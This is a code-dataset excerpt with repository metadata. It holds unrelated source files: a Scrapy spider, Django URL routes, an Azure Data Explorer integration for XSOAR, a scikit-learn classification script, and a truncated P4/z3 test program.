blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d54e532e6ca44bc53831b5abdcf003a2c8825d08 | 73db66a771cbef43abf1fefc7e0d210001ec2b4a | /example/example/spiders/book_spider.py | 49c774a8c963ad55285e8c1f814908dc49c7ee0e | [] | no_license | tianrking/Scrapy_Demo | 52008c094d4858383a61c2fd03ba3aa0dddcb3b9 | 9c621d2e1175aac5cfff0f42fc7667be6f46c9c1 | refs/heads/master | 2020-12-14T21:18:33.356797 | 2020-02-03T08:24:48 | 2020-02-03T08:24:48 | 234,871,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | import scrapy
class BookSpider(scrapy.Spider):
name="books"
start_urls=["https://ncov.dxy.cn/ncovh5/view/pneumonia"]
#start_urls=["http://books.toscrape.com/"]
def parse(self,response):
#for book in response.css('article.product_pod'):
#for book in response.xpath('//article[@class="product_pod"]'):
for a in response.css('div.areaBlock2___27vn7'):
#name=book.xpath('./h3/a/@title').extract_first()
#price=book.css('p.price_color::text').extract_first()
name = a.xpath('./p[@class="subBlock*]/text()')
yield{
'name': name,
#'price': price,
}
# next_url=response.css('ul.pager li.next a::attr(href)').extract_first()
# if next_url:
# next_url= response.urljoin(next_url)
# yield scrapy.Request(next_url,callback=self.parse) | [
"root@localhost.localdomain"
] | root@localhost.localdomain |
c786245e6f92c1f9c62b1acb26e39a9ac9f11ac1 | fafa39d9eda46f5ee0d3ac7bf199237e7a748931 | /API/course/urls.py | 1c02cf1d5389151843b1392e818592f06517b2a3 | [
"MIT"
] | permissive | kasimbozdag/SWE_573 | bfb137b6db94619d76082ea3884036d64cfe934d | 4bce24f98fe6980b1f2c83196b8454b56118186b | refs/heads/master | 2022-02-18T11:42:04.363376 | 2019-05-29T09:56:19 | 2019-05-29T09:56:19 | 171,244,989 | 0 | 0 | MIT | 2022-02-10T10:36:38 | 2019-02-18T08:35:15 | JavaScript | UTF-8 | Python | false | false | 1,259 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^create_course', views.CourseCreateAPIView.as_view(), name="create-course"),
url(r'^list', views.CourseListAPIView.as_view(), name="courses"),
url(r'^my', views.TeacherCoursesAPIView.as_view(), name="my-courses"),
url(r'^(?P<pk>[0-9]+)/inactivate', views.CourseInactivateAPIView.as_view(), name="inactivate"),
url(r'^(?P<pk>[0-9]+)/activate', views.CourseActivateAPIView.as_view(), name="activate"),
url(r'^enrolled', views.EnrolledCourseAPIView.as_view(), name="enroll-list"),
url(r'^(?P<pk>[0-9]+)/enroll', views.EnrollCourseAPIView.as_view(), name="enroll"),
url(r'^(?P<pk>[0-9]+)/drop', views.EnrollmentAPIView.as_view(), name="drop"),
url(r'^(?P<obj_model>[0-9]+)/(?P<obj_pk>[0-9]+)/(?P<p_model>[0-9]+)/(?P<p_pk>[0-9]+)', views.PrerequisiteCreateAPIView.as_view(), name="pre"),
url(r'^prerequisite/(?P<pk>[0-9]+)', views.PrerequisiteAPIView.as_view(), name="pre-delete"),
url(r'^(?P<obj_model>[A-Za-z]+)/(?P<obj_pk>[0-9]+)', views.FullFilledCreateAPIView.as_view(), name="full"),
url(r'^(?P<pk>[0-9]+)', views.CourseAPIView.as_view(), name="course"),
url(r'^models', views.ContentTypeListAPIView.as_view(), name="models"),
]
| [
"bozdag80@yahoo.com"
] | bozdag80@yahoo.com |
631ed22a4ad5c8562b3a2322cf4296eb416e9432 | 0d55bde6f4784f6dea9e8e6945d05bbf627e1e7d | /Packs/AzureDataExplorer/Integrations/AzureDataExplorer/AzureDataExplorer.py | 61982787a34eb6d8b32572cb86ef1ab05b7453ec | [
"MIT"
] | permissive | crestdatasystems/content | d7040415431b5d06d1569433a49869afcb0292bd | 5f0f00840c39f028dca8377551bbd725d8ee8a2d | refs/heads/master | 2023-08-16T19:35:38.150912 | 2023-07-11T05:59:59 | 2023-07-11T05:59:59 | 280,669,011 | 2 | 1 | MIT | 2023-03-10T16:00:35 | 2020-07-18T14:06:44 | Python | UTF-8 | Python | false | false | 25,963 | py | # type: ignore
# Disable insecure warnings
from CommonServerPython import *
''' IMPORTS '''
import uuid
from typing import Dict, List
from decimal import Decimal
import requests
from azure.kusto.data.response import KustoResponseDataSet, KustoResponseDataSetV1
from datetime import datetime
from MicrosoftApiModule import * # noqa: E402
''' CONSTANTS '''
DEFAULT_PAGE_NUMBER = '1'
DEFAULT_LIMIT = '50'
DATE_TIME_FORMAT = '%Y-%m-%dT%H:%M:%S'
REQUEST_BASE_TIMEOUT = 20
GRANT_BY_CONNECTION = {'Device Code': DEVICE_CODE, 'Authorization Code': AUTHORIZATION_CODE}
class DataExplorerClient:
"""
Azure Data Explorer API Client.
"""
def __init__(self, cluster_url: str, client_id: str, client_activity_prefix: str, verify: bool,
proxy: bool, connection_type: str, tenant_id: str = None, enc_key: str = None,
auth_code: str = None, redirect_uri: str = None):
if '@' in client_id: # for use in test-playbook
client_id, refresh_token = client_id.split('@')
integration_context = get_integration_context()
integration_context.update(current_refresh_token=refresh_token)
set_integration_context(integration_context)
if not cluster_url.startswith('https://'):
raise ValueError(
"Cluster URL parameter must contain "
"'https://' as prefix (e.g. https://help.kusto.windows.net).")
self.cluster_url = cluster_url
self.host = cluster_url.split("https://")[1]
self.scope = f'{cluster_url}/user_impersonation offline_access user.read' if 'Authorization' not in connection_type \
else 'https://management.azure.com/.default'
self.client_activity_prefix = client_activity_prefix
client_args = assign_params(
self_deployed=True,
auth_id=client_id,
token_retrieval_url='https://login.microsoftonline.com/organizations/oauth2/v2.0/token',
grant_type=GRANT_BY_CONNECTION[connection_type],
base_url=cluster_url,
verify=verify,
proxy=proxy,
scope=self.scope,
tenant_id=tenant_id,
enc_key=enc_key,
auth_code=auth_code,
redirect_uri=redirect_uri
)
self.ms_client = MicrosoftClient(**client_args)
self.connection_type = connection_type
def http_request(self, method, url_suffix: str = None, full_url: str = None, params: dict = None, headers=None,
data=None, timeout: int = REQUEST_BASE_TIMEOUT):
if headers is None:
headers = {}
if data is None:
data = {}
headers.update({
'Accept': 'application/json',
'Expect': '100-Continue',
'Content-Type': 'application/json; charset=utf-8',
'Host': self.host,
'Connection': 'Keep-Alive',
})
res = self.ms_client.http_request(method=method,
url_suffix=url_suffix,
full_url=full_url,
headers=headers,
json_data=data,
params=params,
resp_type='response',
timeout=timeout,
ok_codes=(200, 204, 400, 401, 403, 404, 409))
if res.status_code in (200, 204) and not res.text:
return res
res_json = res.json()
if res.status_code in (400, 401, 403, 404, 409):
code = res_json.get('error', {}).get('code', 'Error')
error_msg = res_json.get('error', {}).get('message', res_json)
raise ValueError(
f'[{code} {res.status_code}] {error_msg}'
)
return res_json
def search_query_execute_request(self, database_name: str, query: str,
server_timeout: Decimal, client_activity_id: str) -> Dict[str, Any]:
"""
Execute a KQL query against the given database inside the specified cluster.
The query's client activity ID is a combination of the user's
client_activity_prefix parameter and a random UUID.
Args:
database_name (str): The name of the database to execute the query on.
query (str): The KQL query to execute against the database.
server_timeout: Query execution timeout on server side.
client_activity_id (str): A unique ID for query execution.
Returns:
Dict[str,Any]: API response from Azure.
"""
data = retrieve_common_request_body(database_name, query, {
"Options": {
"servertimeout": f"{server_timeout}m"
}
})
headers = {
"x-ms-client-request-id": client_activity_id
}
response = self.http_request(
"POST", url_suffix="/v1/rest/query", data=data, headers=headers,
timeout=calculate_total_request_timeout(server_timeout))
return response
def search_queries_list_request(self, database_name: str,
client_activity_id: str) -> Dict[str, Any]:
"""
List search queries that have reached a final state on the given database.
When the client_activity_id argument is provided, the request will retrieve information
regarding specific search query.
Args:
database_name (str): The name of the database to see the completed queries.
client_activity_id (str): client-specified identity of the request.
Returns:
Dict[str, Any]: API response from Azure.
"""
mgmt_query = f".show queries | where ClientActivityId=='{client_activity_id}'" if client_activity_id \
else ".show queries | sort by StartedOn"
return self.management_query_request(database_name, mgmt_query)
def running_search_queries_list_request(self, database_name: str, client_activity_id: str) -> \
Dict[str, Any]:
"""
List currently running search queries on the given database.
When client_activity_id argument is set, the request will retrieve information
regarding specific running search query.
Args:
database_name (str): The name of the database to see the running queries.
client_activity_id (str): Client-specified identity of the request.
Returns:
Dict[str, Any]: API response from Azure.
"""
mgmt_query = f".show running queries | where ClientActivityId=='{client_activity_id}'" if client_activity_id \
else ".show running queries | sort by StartedOn"
return self.management_query_request(database_name, mgmt_query)
def running_search_query_delete_request(self, database_name: str, client_activity_id: str,
reason: str) -> Dict[str, Any]:
"""
Starts a best-effort attempt to cancel a specific running search query
on the given database.
Args:
database_name (str): The name of the database to see the completed queries on.
client_activity_id (str): Client specified identity of the request.
reason (str): The reason for the cancellation.
Returns:
Dict[str, Any]: API response from Azure.
"""
cancel_running_query = f".cancel query '{client_activity_id}'"
if reason:
cancel_running_query += f" with ( reason = '{reason}' )"
return self.management_query_request(database_name, cancel_running_query)
def management_query_request(self, database_name: str, mgmt_query: str) -> Dict[str, Any]:
"""
API call method for management query endpoint.
Each requests that uses management query endpoint uses this method.
Args:
database_name (str): The name of the database to see the completed queries on.
mgmt_query (str): Client specified identity of the request.
Returns:
Dict[str, Any]: API response from Azure.
"""
data = retrieve_common_request_body(database_name, mgmt_query)
response = self.http_request("POST", url_suffix="/v1/rest/mgmt", data=data)
return response
def search_query_execute_command(client: DataExplorerClient, args: Dict[str, Any]) -> CommandResults:
"""
Execute search query command.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
args (Dict[str, Any]): Command arguments from XSOAR.
Returns:
CommandResults: Command results with raw response, outputs and readable outputs.
"""
query = str(args['query'])
database_name = str(args['database_name'])
timeout = Decimal(args.get('timeout', '5'))
if timeout < 0 or timeout > 60:
raise ValueError("Timeout argument should be a float number between 0 to 60.")
client_activity_id = f"{client.client_activity_prefix};{uuid.uuid4()}"
response = client.search_query_execute_request(database_name, query, timeout, client_activity_id)
response_kusto_dataset = KustoResponseDataSetV1(response)
primary_results = convert_kusto_response_to_dict(response_kusto_dataset)
outputs = {
'Database': database_name,
'Query': query,
'ClientActivityID': client_activity_id,
'PrimaryResults': primary_results
}
readable_output = tableToMarkdown(
f'Results of executing search query with client activity ID: {client_activity_id}',
primary_results, headerTransform=pascalToSpace)
command_results = CommandResults(
outputs_prefix='AzureDataExplorer.SearchQueryResults',
outputs_key_field='ClientActivityID',
outputs=outputs,
raw_response=response,
readable_output=readable_output
)
return command_results
def search_queries_list_command(client: DataExplorerClient, args: Dict[str, Any]) -> CommandResults:
"""
List completed search queries command.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
args (Dict[str, Any]): Command arguments from XSOAR.
Returns:
CommandResults: Command results with raw response, outputs and readable outputs.
"""
database_name = str(args['database_name'])
page = arg_to_number(args.get('page', DEFAULT_PAGE_NUMBER))
page_size = arg_to_number(args.get('page_size'))
limit = arg_to_number(args.get('limit', DEFAULT_LIMIT))
client_activity_id = str(args.get('client_activity_id', ''))
validate_list_command_arguments(page, page_size, limit)
response = client.search_queries_list_request(
database_name, client_activity_id)
return retrieve_command_results_of_list_commands(response, 'List of Completed Search Queries',
page, page_size, limit, 'AzureDataExplorer.SearchQuery')
def running_search_queries_list_command(client: DataExplorerClient, args: Dict[str, Any]) -> CommandResults:
"""
List currently running search queries command.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
args (Dict[str, Any]): Command arguments from XSOAR.
Returns:
CommandResults: Command results with raw response, outputs and readable outputs.
"""
database_name = str(args['database_name'])
page = arg_to_number(args.get('page', DEFAULT_PAGE_NUMBER))
page_size = arg_to_number(args.get('page_size'))
limit = arg_to_number(args.get('limit', DEFAULT_LIMIT))
client_activity_id = str(args.get('client_activity_id', ''))
validate_list_command_arguments(page, page_size, limit)
response = client.running_search_queries_list_request(
database_name, client_activity_id)
return retrieve_command_results_of_list_commands(response, 'List of Currently running Search Queries',
page, page_size, limit, 'AzureDataExplorer.RunningSearchQuery')
def running_search_query_cancel_command(client: DataExplorerClient, args: Dict[str, Any]) -> \
CommandResults:
"""
Cancel currently running search query command.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
args (Dict[str, Any]): Command arguments from XSOAR.
Returns:
CommandResults: Command results with raw response, outputs and readable outputs.
"""
client_activity_id = str(args['client_activity_id'])
database_name = str(args['database_name'])
reason = str(args.get('reason'))
response = client.running_search_query_delete_request(
database_name, client_activity_id, reason)
response_kusto_dataset = KustoResponseDataSetV1(response)
outputs = convert_kusto_response_to_dict(response_kusto_dataset)
readable_output = tableToMarkdown(f'Canceled Search Query {client_activity_id}',
outputs,
headers=[
'ClientRequestId', 'ReasonPhrase',
'RunningQueryCanceled'],
headerTransform=pascalToSpace)
command_results = CommandResults(
outputs_prefix='AzureDataExplorer.CanceledSearchQuery',
outputs_key_field='ClientRequestId',
outputs=outputs,
raw_response=response,
readable_output=readable_output
)
return command_results
def retrieve_command_results_of_list_commands(response: Dict[str, Any], base_header: str,
page: int, page_size: int, limit: int,
outputs_prefix: str) -> CommandResults:
"""
Retrieves the command results of list commands.
Args:
response (Dict[str,Any]): API response from Azure.
base_header: (str) Header prefix in the readable output.
page (int): Page number.
page_size (int): Page size.
limit (int): Page size.
outputs_prefix (str): Command context outputs prefix.
Returns:
CommandResults: List Command results.
"""
response_kusto_dataset = KustoResponseDataSetV1(response)
total_rows = response_kusto_dataset.primary_results[0].rows_count
outputs = convert_kusto_response_to_dict(response_kusto_dataset, page, page_size, limit)
readable_header = format_header_for_list_commands(base_header,
total_rows, page, page_size, limit)
readable_output = tableToMarkdown(readable_header,
outputs,
headers=['ClientActivityId', 'User', 'Text',
'Database', 'StartedOn',
'LastUpdatedOn',
'State'],
headerTransform=pascalToSpace)
command_results = CommandResults(
outputs_prefix=outputs_prefix,
outputs_key_field='ClientActivityId',
outputs=outputs,
raw_response=response,
readable_output=readable_output
)
return command_results
''' INTEGRATION HELPER METHODS '''
def convert_datetime_fields(raw_data: List[dict]) -> List[dict]:
"""
Converting datetime fields of the response from the API call
to str type (in order to make the response json-serializable).
Args:
raw_data (List[dict]): Response from API call to azure.
Returns:
List[dict]: JSON serializable response from API.
"""
for row in raw_data:
for key, value in row.items():
if isinstance(value, datetime):
row[key] = value.strftime(DATE_TIME_FORMAT)
if isinstance(value, timedelta):
row[key] = str(value)
return raw_data
def convert_kusto_response_to_dict(kusto_response: KustoResponseDataSet, page: int = None,
page_size: int = None, limit: int = None) -> List[dict]:
"""
Converting KustoResponseDataSet object to dict type.
Support two use cases of pagination: 'Manual Pagination' and 'Automatic Pagination'.
Args:
kusto_response (KustoResponseDataSet): The response from API call.
page (int): First index to retrieve from.
page_size (int) : Number of records to return per page.
limit (int): Limit on the number of the results to return.
Returns:
Dict[str, Any]: Converted response.
"""
raw_data = kusto_response.primary_results[0].to_dict().get('data', [])
if page and page_size: # Manual Pagination
from_index = min((page - 1) * page_size, len(raw_data))
to_index = min(from_index + page_size, len(raw_data))
relevant_raw_data = raw_data[from_index:to_index]
elif limit: # Automatic Pagination
relevant_raw_data = raw_data[:min(len(raw_data), limit)]
else: # used only in search query execution command
relevant_raw_data = raw_data
serialized_data: List[dict] = convert_datetime_fields(relevant_raw_data)
return serialized_data
def format_header_for_list_commands(base_header: str, rows_count: int,
page: int, page_size: int, limit: int) -> str:
"""
Retrieve the header of the readable output for list commands.
Format the header according to the pagination use case:
'Manual Pagination' or 'Automatic Pagination'.
Args:
base_header (str): The header prefix.
rows_count (int): The number of rows in the output.
page (int): Client's page number argument.
page_size (int): number of records per page.
limit (int): Client's limit argument.
Returns:
Dict[str, Any]: Header for readable output of the command.
"""
if page_size:
total_pages = rows_count // page_size + (rows_count % page_size != 0)
if rows_count > 0:
base_header += f' \nShowing page {page} out of {total_pages} total pages.' \
f' Current page size: {page_size}.'
else:
base_header += f' \nShowing 0 to {limit} records out of {rows_count}.'
return base_header
def retrieve_common_request_body(database_name: str, query: str,
properties: Dict[str, Any] = None) -> Dict[str, Any]:
"""
Retrieve requests body. For every request, the body contains the database name and the query to the execute.
Args:
database_name (str): The database name.
query (str): The query to execute.
properties (Dict[str, Any], optional): Other user's properties to send in the request
Defaults to None.
Returns:
Dict[str, Any]: Body raw data for the request.
"""
data = {
"db": database_name,
"csl": query
}
if properties:
data['properties'] = properties
return data
def calculate_total_request_timeout(server_timeout: Decimal) -> int:
"""
Calculates the total timeout duration of a request.
Takes into consideration the timeout duration on server side.
Args:
server_timeout (int): Quesry execution duration on server side.
Returns:
int: Total timeout duration of a request.
"""
server_timeout_in_seconds = int(server_timeout * 60)
return server_timeout_in_seconds + REQUEST_BASE_TIMEOUT
def validate_list_command_arguments(page: int, page_size: int, limit: int) -> None:
"""
Validation of page number, page size and limit arguments in list commands.
Args:
page (int): The page number.
page_size(int) : Limit on page size.
limit (int): Limit on number of records.
Raises:
ValueError: Error message.
"""
if not page >= 1 and limit >= 1 and page_size >= 1:
raise ValueError("Page and limit arguments must be integers greater than 0.")
''' AUTHORIZATION METHODS '''
def start_auth(client: DataExplorerClient) -> CommandResults:
"""
Start the authorization process.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
Returns:
CommandResults: authentication guidelines.
"""
result = client.ms_client.start_auth('!azure-data-explorer-auth-complete')
return CommandResults(readable_output=result)
def complete_auth(client: DataExplorerClient) -> str:
"""
Start the authorization process.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
Returns:
str: Message about completing the authorization process successfully.
"""
client.ms_client.get_access_token()
return '✅ Authorization completed successfully.'
def reset_auth() -> str:
"""
Start the authorization process.
Returns:
str: Message about resetting the authorization process.
"""
set_integration_context({})
return 'Authorization was reset successfully. Run **!azure-data-explorer-auth-start** to start the authentication \
process.'
def test_connection(client: DataExplorerClient) -> str:
"""
Test the connection with Azure Data Explorer service.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
Returns:
str: Message about successfully connected to the Azure Data Explorer.
"""
client.ms_client.get_access_token()
return '✅ Success!'
def test_module(client: DataExplorerClient) -> str:
"""Tests API connectivity and authentication for client credentials only.
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param Client: client to use
:return: 'ok' if test passed.
:rtype: ``str``
"""
# This should validate all the inputs given in the integration configuration panel,
# either manually or by using an API that uses them.
if 'Authorization' not in client.connection_type:
raise DemistoException(
"Please enable the integration and run `!azure-data-explorer-auth-start`"
"and `!azure-data-explorer-auth-complete` to log in."
"You can validate the connection by running `!azure-data-explorer-auth-test`\n"
"For more details press the (?) button.")
else:
raise Exception("When using user auth flow configuration, "
"Please enable the integration and run the "
"!azure-data-explorer-auth-test command in order to test it")
def main() -> None:
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
params: Dict[str, Any] = demisto.params()
args: Dict[str, Any] = demisto.args()
cluster_url = params['cluster_url']
client_id = params['client_id']
client_activity_prefix = params.get('client_activity_prefix')
verify_certificate: bool = not params.get('insecure', False)
proxy = params.get('proxy', False)
enc_key = (params.get('credentials', {})).get('password')
tenant_id = params.get('tenant_id')
connection_type = params.get('authentication_type', 'Device Code')
auth_code = (params.get('auth_code', {})).get('password')
redirect_uri = params.get('redirect_uri')
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
requests.packages.urllib3.disable_warnings()
client: DataExplorerClient = DataExplorerClient(cluster_url, client_id, client_activity_prefix,
verify_certificate, proxy, connection_type,
tenant_id, enc_key, auth_code, redirect_uri)
commands = {
'azure-data-explorer-search-query-execute': search_query_execute_command,
'azure-data-explorer-search-query-list': search_queries_list_command,
'azure-data-explorer-running-search-query-list': running_search_queries_list_command,
'azure-data-explorer-running-search-query-cancel': running_search_query_cancel_command,
}
if command == 'test-module':
return_results(test_module(client))
elif command == 'azure-data-explorer-generate-login-url':
return_results(generate_login_url(client.ms_client))
elif command == 'azure-data-explorer-auth-start':
return_results(start_auth(client))
elif command == 'azure-data-explorer-auth-complete':
return_results(complete_auth(client))
elif command == 'azure-data-explorer-auth-reset':
return_results(reset_auth())
elif command == 'azure-data-explorer-auth-test':
return_results(test_connection(client))
elif command in commands:
return_results(commands[command](client, args))
else:
raise NotImplementedError(f'{command} command is not implemented.')
except Exception as e:
error_text = str(e)
if "OneApiErrors" in error_text:
error_text = "The execution of search query failed due a client cancel request."
elif "Request execution timeout" in error_text:
error_text = "Search query execution took longer than the assigned timeout" \
" value and has been aborted."
return_error(f'Failed to execute {command} command.\nError:\n{error_text}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| [
"noreply@github.com"
] | crestdatasystems.noreply@github.com |
401fce8967d656ccb95f7f42b57e3d4814b4d9c3 | aae551baa369fda031f363c2afbdf1984467f16d | /Machine_Learning/Contest/Code/gaussian_process.py | 879a09d88af6d3a713ec7d9b52d8ab5d61a59578 | [] | no_license | ameet-1997/Course_Assignments | 37f7d4115baec383ccf029772efcf9c33beb2a23 | 629e9d5cfc6fa6cf37a96c5fcc33bc669cbdc59d | refs/heads/master | 2021-05-16T16:23:32.731296 | 2018-02-03T05:57:01 | 2018-02-03T05:57:01 | 119,939,202 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,748 | py | import pandas as pd
import numpy as np
from sklearn.preprocessing import Imputer
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from sklearn.utils import shuffle
import time
from sklearn.svm import SVC
from sklearn.ensemble import BaggingClassifier
import matplotlib.pyplot as plt
from sklearn.preprocessing import StandardScaler
from sklearn.gaussian_process import GaussianProcessClassifier
# Load and impute the data using the mean
train_data = pd.read_csv("train.csv")
# Get the train labels and subset the data
train_labels = train_data.iloc[:,-1]
train_data = train_data.iloc[:,1:-1]
# Impute it
i = Imputer(strategy='median')
train_data = i.fit_transform(train_data)
test_data = pd.read_csv("test.csv")
test_data = test_data.iloc[:,1:]
test_data = i.transform(test_data)
# Get validation data
train_data, validation_data, train_labels, validation_labels = train_test_split(train_data, train_labels, test_size=1000, stratify=np.array(train_labels))
# Dimensionality Reduction
pca = PCA(n_components=200)
pca.fit(train_data, train_labels)
train_data = pca.transform(train_data)
validation_data = pca.transform(validation_data)
test_data = pca.transform(test_data)
# Gaussian Kernel
start_time = time.time()
lin = GaussianProcessClassifier(n_jobs=-1, max_iter_predict=10, warm_start=True)
lin.fit(train_data, train_labels)
predicted_labels = lin.predict(validation_data)
print("Validation Score: "+str(f1_score(validation_labels, predicted_labels, average='macro')))
print("Total time: "+str(time.time()-start_time))
# test_labels = pd.DataFrame(lin.predict(test_data))
# test_labels.to_csv("gaussian_process1.csv", index=True, index_label=['id','label']) | [
"ameetsd97@gmail.com"
] | ameetsd97@gmail.com |
b03a0215246eb83e851d9f6c084dc32406b38a7b | ddf2e85b8e8fda8cbaf92fc79a53abdb962c8bde | /tests/violated/unused_return/orig.py | abab334f0f228067c4361058deb44c937a78d4aa | [
"Apache-2.0"
] | permissive | p4gauntlet/toz3 | 359bd20bdc8fe2b7ccf3564a90988823d94df078 | 0fddd9e21ac7b80e4a0bf8a4e6b1bdcc01308724 | refs/heads/master | 2023-05-11T17:23:10.972917 | 2023-05-09T16:02:56 | 2023-05-09T16:02:56 | 329,900,719 | 4 | 0 | Apache-2.0 | 2023-02-22T23:28:49 | 2021-01-15T12:03:53 | Python | UTF-8 | Python | false | false | 17,966 | py | from p4z3 import *
def p4_program(prog_state):
prog_state.declare_global(
Enum( "error", ["NoError", "PacketTooShort", "NoMatch", "StackOutOfBounds", "HeaderTooShort", "ParserTimeout", "ParserInvalidArgument", ])
)
prog_state.declare_global(
P4Extern("packet_in", type_params=[], methods=[P4Declaration("extract", P4Method("extract", type_params=(None, [
"T",]), params=[
P4Parameter("out", "hdr", "T", None),])), P4Declaration("extract", P4Method("extract", type_params=(None, [
"T",]), params=[
P4Parameter("out", "variableSizeHeader", "T", None),
P4Parameter("in", "variableFieldSizeInBits", z3.BitVecSort(32), None),])), P4Declaration("lookahead", P4Method("lookahead", type_params=("T", [
"T",]), params=[])), P4Declaration("advance", P4Method("advance", type_params=(None, []), params=[
P4Parameter("in", "sizeInBits", z3.BitVecSort(32), None),])), P4Declaration("length", P4Method("length", type_params=(z3.BitVecSort(32), []), params=[])), ])
)
prog_state.declare_global(
P4Extern("packet_out", type_params=[], methods=[P4Declaration("emit", P4Method("emit", type_params=(None, [
"T",]), params=[
P4Parameter("in", "hdr", "T", None),])), ])
)
prog_state.declare_global(
P4Declaration("verify", P4Method("verify", type_params=(None, []), params=[
P4Parameter("in", "check", z3.BoolSort(), None),
P4Parameter("in", "toSignal", "error", None),]))
)
prog_state.declare_global(
P4Declaration("NoAction", P4Action("NoAction", params=[], body=BlockStatement([]
) ))
)
prog_state.declare_global(
P4Declaration("match_kind", ["exact", "ternary", "lpm", ])
)
prog_state.declare_global(
P4Declaration("match_kind", ["range", "optional", "selector", ])
)
prog_state.declare_global(
ValueDeclaration("__v1model_version", 20180101, z3_type=z3.BitVecSort(32))
)
prog_state.declare_global(
StructType("standard_metadata_t", prog_state, fields=[("ingress_port", z3.BitVecSort(9)), ("egress_spec", z3.BitVecSort(9)), ("egress_port", z3.BitVecSort(9)), ("instance_type", z3.BitVecSort(32)), ("packet_length", z3.BitVecSort(32)), ("enq_timestamp", z3.BitVecSort(32)), ("enq_qdepth", z3.BitVecSort(19)), ("deq_timedelta", z3.BitVecSort(32)), ("deq_qdepth", z3.BitVecSort(19)), ("ingress_global_timestamp", z3.BitVecSort(48)), ("egress_global_timestamp", z3.BitVecSort(48)), ("mcast_grp", z3.BitVecSort(16)), ("egress_rid", z3.BitVecSort(16)), ("checksum_error", z3.BitVecSort(1)), ("parser_error", "error"), ("priority", z3.BitVecSort(3)), ], type_params=[])
)
prog_state.declare_global(
Enum( "CounterType", ["packets", "bytes", "packets_and_bytes", ])
)
prog_state.declare_global(
Enum( "MeterType", ["packets", "bytes", ])
)
prog_state.declare_global(
P4Extern("counter", type_params=[], methods=[P4Declaration("counter", P4Method("counter", type_params=(None, []), params=[
P4Parameter("none", "size", z3.BitVecSort(32), None),
P4Parameter("none", "type", "CounterType", None),])), P4Declaration("count", P4Method("count", type_params=(None, []), params=[
P4Parameter("in", "index", z3.BitVecSort(32), None),])), ])
)
prog_state.declare_global(
P4Extern("direct_counter", type_params=[], methods=[P4Declaration("direct_counter", P4Method("direct_counter", type_params=(None, []), params=[
P4Parameter("none", "type", "CounterType", None),])), P4Declaration("count", P4Method("count", type_params=(None, []), params=[])), ])
)
prog_state.declare_global(
P4Extern("meter", type_params=[], methods=[P4Declaration("meter", P4Method("meter", type_params=(None, []), params=[
P4Parameter("none", "size", z3.BitVecSort(32), None),
P4Parameter("none", "type", "MeterType", None),])), P4Declaration("execute_meter", P4Method("execute_meter", type_params=(None, [
"T",]), params=[
P4Parameter("in", "index", z3.BitVecSort(32), None),
P4Parameter("out", "result", "T", None),])), ])
)
prog_state.declare_global(
P4Extern("direct_meter", type_params=[
"T",], methods=[P4Declaration("direct_meter", P4Method("direct_meter", type_params=(None, []), params=[
P4Parameter("none", "type", "MeterType", None),])), P4Declaration("read", P4Method("read", type_params=(None, []), params=[
P4Parameter("out", "result", "T", None),])), ])
)
prog_state.declare_global(
P4Extern("register", type_params=[
"T",], methods=[P4Declaration("register", P4Method("register", type_params=(None, []), params=[
P4Parameter("none", "size", z3.BitVecSort(32), None),])), P4Declaration("read", P4Method("read", type_params=(None, []), params=[
P4Parameter("out", "result", "T", None),
P4Parameter("in", "index", z3.BitVecSort(32), None),])), P4Declaration("write", P4Method("write", type_params=(None, []), params=[
P4Parameter("in", "index", z3.BitVecSort(32), None),
P4Parameter("in", "value", "T", None),])), ])
)
prog_state.declare_global(
P4Extern("action_profile", type_params=[], methods=[P4Declaration("action_profile", P4Method("action_profile", type_params=(None, []), params=[
P4Parameter("none", "size", z3.BitVecSort(32), None),])), ])
)
prog_state.declare_global(
P4Declaration("random", P4Method("random", type_params=(None, [
"T",]), params=[
P4Parameter("out", "result", "T", None),
P4Parameter("in", "lo", "T", None),
P4Parameter("in", "hi", "T", None),]))
)
prog_state.declare_global(
P4Declaration("digest", P4Method("digest", type_params=(None, [
"T",]), params=[
P4Parameter("in", "receiver", z3.BitVecSort(32), None),
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
Enum( "HashAlgorithm", ["crc32", "crc32_custom", "crc16", "crc16_custom", "random", "identity", "csum16", "xor16", ])
)
prog_state.declare_global(
P4Declaration("mark_to_drop", P4Method("mark_to_drop", type_params=(None, []), params=[]))
)
prog_state.declare_global(
P4Declaration("mark_to_drop", P4Method("mark_to_drop", type_params=(None, []), params=[
P4Parameter("inout", "standard_metadata", "standard_metadata_t", None),]))
)
prog_state.declare_global(
